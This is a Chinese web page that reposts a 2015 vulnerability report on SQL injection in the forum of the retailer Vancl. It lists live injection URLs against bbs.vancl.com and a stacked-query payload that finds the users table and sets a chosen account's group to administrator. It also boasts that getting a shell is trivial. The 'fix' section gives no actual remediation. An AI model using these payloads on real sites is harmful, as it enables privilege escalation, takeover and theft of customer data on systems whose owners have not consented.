网站地图    收藏   

主页 > 后端 > 网站安全 >

凡客诚品某频道再暴SQL注入漏洞及修复 - 网站安

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 再暴差不多同样的SQL注入漏洞。注入地址:http://bbs.vancl.com/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascxposter=1#39;) and 1=1--http://bbs.vancl.com/space/man......

再暴差不多同样的SQL注入漏洞
注入地址:
http://bbs.vancl.com/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1') and 1=1--
http://bbs.vancl.com/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1') and 1=2--
 
可以直接执行,拿Shell 不在话下哦,呵呵。。。
这里就不演试了,SQL注入对了电商来说,是很高的安全漏洞。。。。数据伤不起。。。
 
附上利用语句:
ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1');declare @t nvarchar(40) select @t=(select top 1 name from sysobjects where name like'%_users' and xtype='U') exec('update '%2b@t%2b' set groupid=1 where username=''xxxx''')--
 
取得密或提权。。。
 
 
 
漏洞证明:
 
 

 
 
修复方案:
 
您懂得!
 
 
作者:Jannock

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论